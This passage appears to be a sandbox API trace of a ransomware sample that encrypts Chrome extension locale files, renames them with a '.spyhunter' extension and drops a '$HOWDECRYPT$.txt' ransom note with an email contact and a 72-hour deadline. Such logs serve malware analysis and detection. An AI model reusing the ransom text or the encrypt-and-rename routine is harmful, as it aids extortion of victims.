(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.825] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json") returned 159 [0159.825] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.825] GetProcessHeap () returned 0x2c0000 [0159.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.825] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248eb7c*=0x30a, lpOverlapped=0x0) returned 1 [0159.845] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffcf6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.845] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x248eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248eb7c*=0x30a, lpOverlapped=0x0) returned 1 [0159.845] GetProcessHeap () returned 0x2c0000 [0159.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.846] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.846] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb7c, lpOverlapped=0x0 | out: lpBuffer=0x248ebbc*, lpNumberOfBytesWritten=0x248eb7c*=0x4, lpOverlapped=0x0) returned 1 [0159.846] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb7c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb7c*=0x30, lpOverlapped=0x0) returned 1 [0159.846] CloseHandle (hObject=0x9c) returned 1 [0159.846] GetProcessHeap () returned 0x2c0000 [0159.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.846] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.spyhunter") returned 169 [0159.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.spyhunter")) returned 1 [0159.847] GetProcessHeap () returned 0x2c0000 [0159.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.847] GetProcessHeap () returned 0x2c0000 [0159.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.847] GetProcessHeap () returned 0x2c0000 [0159.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80990 | out: hHeap=0x2c0000) returned 1 [0159.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.848] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.848] WriteFile (in: hFile=0x9c, lpBuffer=0x248eaf3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec1c, lpOverlapped=0x0 | out: lpBuffer=0x248eaf3*, lpNumberOfBytesWritten=0x248ec1c*=0x127, lpOverlapped=0x0) returned 1 [0159.854] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.854] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec1c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec1c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.854] CloseHandle (hObject=0x9c) returned 1 [0159.854] GetProcessHeap () returned 0x2c0000 [0159.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1b4b0 | out: hHeap=0x2c0000) returned 1 [0159.854] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ebb8 | out: pbBuffer=0x248ebb8) returned 1 [0159.854] GetProcessHeap () returned 0x2c0000 [0159.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.855] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ebb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ebb0*=0x30) returned 1 [0159.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json") returned 159 [0159.859] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.859] GetProcessHeap () returned 0x2c0000 [0159.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.860] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248eb74*=0x2c6, lpOverlapped=0x0) returned 1 [0159.904] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffd3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.904] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x248eb74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248eb74*=0x2c6, lpOverlapped=0x0) returned 1 [0159.905] GetProcessHeap () returned 0x2c0000 [0159.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.907] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.907] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb74, lpOverlapped=0x0 | out: lpBuffer=0x248ebb4*, lpNumberOfBytesWritten=0x248eb74*=0x4, lpOverlapped=0x0) returned 1 [0159.907] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb74, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb74*=0x30, lpOverlapped=0x0) returned 1 [0159.907] CloseHandle (hObject=0x9c) returned 1 [0159.907] GetProcessHeap () returned 0x2c0000 [0159.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.907] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.spyhunter") returned 169 [0159.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.spyhunter")) returned 1 [0159.908] GetProcessHeap () returned 0x2c0000 [0159.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.908] GetProcessHeap () returned 0x2c0000 [0159.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.908] GetProcessHeap () returned 0x2c0000 [0159.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80370 | out: hHeap=0x2c0000) returned 1 [0159.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.909] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.909] WriteFile (in: hFile=0x9c, lpBuffer=0x248eaeb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec14, lpOverlapped=0x0 | out: lpBuffer=0x248eaeb*, lpNumberOfBytesWritten=0x248ec14*=0x127, lpOverlapped=0x0) returned 1 [0159.910] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.910] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec14*=0x2ac, lpOverlapped=0x0) returned 1 [0159.910] CloseHandle (hObject=0x9c) returned 1 [0159.911] GetProcessHeap () returned 0x2c0000 [0159.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1ae50 | out: hHeap=0x2c0000) returned 1 [0159.911] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ebb0 | out: pbBuffer=0x248ebb0) returned 1 [0159.911] GetProcessHeap () returned 0x2c0000 [0159.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.911] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eba8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eba8*=0x30) returned 1 [0159.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json") returned 160 [0159.912] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.912] GetProcessHeap () returned 0x2c0000 [0159.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.912] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248eb6c*=0x2b4, lpOverlapped=0x0) returned 1 [0159.969] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffd4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.969] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x248eb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248eb6c*=0x2b4, lpOverlapped=0x0) returned 1 [0159.969] GetProcessHeap () returned 0x2c0000 [0159.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.969] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.969] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb6c, lpOverlapped=0x0 | out: lpBuffer=0x248ebac*, lpNumberOfBytesWritten=0x248eb6c*=0x4, lpOverlapped=0x0) returned 1 [0159.969] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb6c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb6c*=0x30, lpOverlapped=0x0) returned 1 [0159.969] CloseHandle (hObject=0x9c) returned 1 [0159.969] GetProcessHeap () returned 0x2c0000 [0159.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.970] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.spyhunter") returned 170 [0159.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.spyhunter")) returned 1 [0159.971] GetProcessHeap () returned 0x2c0000 [0159.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.971] GetProcessHeap () returned 0x2c0000 [0159.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.971] GetProcessHeap () returned 0x2c0000 [0159.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1ab20 | out: hHeap=0x2c0000) returned 1 [0159.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.972] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.972] WriteFile (in: hFile=0x9c, lpBuffer=0x248eae3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec0c, lpOverlapped=0x0 | out: lpBuffer=0x248eae3*, lpNumberOfBytesWritten=0x248ec0c*=0x127, lpOverlapped=0x0) returned 1 [0159.973] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.973] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec0c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec0c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.973] CloseHandle (hObject=0x9c) returned 1 [0159.973] GetProcessHeap () returned 0x2c0000 [0159.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3908 | out: hHeap=0x2c0000) returned 1 [0159.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.974] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.974] WriteFile (in: hFile=0x9c, lpBuffer=0x248eadf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec08, lpOverlapped=0x0 | out: lpBuffer=0x248eadf*, lpNumberOfBytesWritten=0x248ec08*=0x127, lpOverlapped=0x0) returned 1 [0159.975] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.975] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec08*=0x2ac, lpOverlapped=0x0) returned 1 [0159.975] CloseHandle (hObject=0x9c) returned 1 [0159.975] GetProcessHeap () returned 0x2c0000 [0159.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7fb0 | out: hHeap=0x2c0000) returned 1 [0159.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 